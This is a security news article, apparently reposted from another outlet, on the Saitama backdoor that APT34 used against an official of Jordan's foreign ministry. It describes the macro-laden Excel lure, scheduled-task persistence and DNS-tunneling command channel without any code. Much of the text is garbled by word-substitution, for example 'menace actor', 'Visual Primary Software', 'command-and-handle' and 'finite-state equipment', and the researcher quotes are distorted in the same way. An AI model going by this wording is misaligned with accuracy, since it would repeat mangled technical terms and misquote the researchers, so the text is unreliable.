• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
Cyber Security News

New Saitama backdoor Targeted Official from Jordan’s Foreign Ministry

You are here: Home / General Cyber Security News / New Saitama backdoor Targeted Official from Jordan’s Foreign Ministry
May 13, 2022

Saitama backdoor

A spear-phishing marketing campaign focusing on Jordan’s overseas ministry has been noticed dropping a new stealthy backdoor dubbed Saitama.

Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage menace actor tracked less than the moniker APT34, citing resemblances to previous strategies staged by the team.

✔ Approved Seller From Our Partners
Malwarebytes Premium 2022

Protect yourself against all threads using Malwarebytes. Get Malwarebytes Premium with 60% discount from a Malwarebytes official seller SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


“Like quite a few of these attacks, the email contained a malicious attachment,” Fortinet researcher Fred Gutierrez stated. “Having said that, the hooked up threat was not a backyard-assortment malware. Instead, it experienced the abilities and techniques typically linked with highly developed persistent threats (APTs).”

APT34, also known as OilRig, Helix Kitten, and Cobalt Gypsy, is recognised to be lively considering the fact that at least 2014 and has a track document of hanging telecom, federal government, defense, oil, and economical sectors in the Center East and North Africa (MENA) by using qualified phishing attacks.

Previously this February, ESET tied the group to a very long-operating intelligence gather procedure aimed at diplomatic corporations, technology organizations, and health care organizations in Israel, Tunisia, and the United Arab Emirates.

Saitama backdoor

The freshly observed phishing message contains a weaponized Microsoft Excel document, opening which prompts a likely target to enable macros, foremost to the execution of a malicious Visual Primary Software (VBA) macro that drops the malware payload (“update.exe”).

On top of that, the macro will take treatment of creating persistence for the implant by including a scheduled activity that repeats every 4 hours.

A .NET-based binary, Saitama leverages the DNS protocol for its command-and-handle (C2) communications as section of an hard work to disguise its traffic, while utilizing a “finite-state equipment” tactic to executing commands received from a C2 server.

CyberSecurity

“In the conclusion, this generally signifies that this malware is receiving responsibilities within a DNS reaction,” Gutierrez stated. DNS tunneling, as it is referred to as, would make it attainable to encode the details of other plans or protocols in DNS queries and responses.

In the last phase, the results of the command execution are subsequently sent back again to the C2 server, with the exfiltrated knowledge developed into a DNS ask for.

“With the volume of work put into creating this malware, it does not surface to be the form to execute the moment and then delete by itself, like other stealthy infostealers,” Gutierrez explained.

“Potentially to prevent triggering any behavioral detections, this malware also does not produce any persistence procedures. Rather, it relies on the Excel macro to create persistence by way of a scheduled endeavor.”

Identified this short article interesting? Stick to THN on Fb, Twitter  and LinkedIn to examine far more unique written content we submit.


Some parts of this short article are sourced from:
thehackernews.com

Previous Post: «the rise of double extortion ransomware The rise of double extortion ransomware
Next Post: Open Source Community Hands White House 10-Point Security Plan Cyber Security News»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • Open Source Community Hands White House 10-Point Security Plan
  • New Saitama backdoor Targeted Official from Jordan’s Foreign Ministry
  • The rise of double extortion ransomware
  • Zyxel Releases Patch for Critical Firewall OS Command Injection Vulnerability
  • Costa Rica Declares National Emergency Following Conti Cyber-Attack
  • Oklahoma City Indian Clinic Data Breach Affects 40,000 Individuals
  • Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks
  • E.U. Proposes New Rules for Tech Companies to Combat Online Child Sexual Abuse
  • Malware Builder Leverages Discord Webhooks
  • You Can’t Eliminate Cyberattacks, So Focus on Reducing the Blast Radius

Copyright © TheCyberSecurity.News, All Rights Reserved.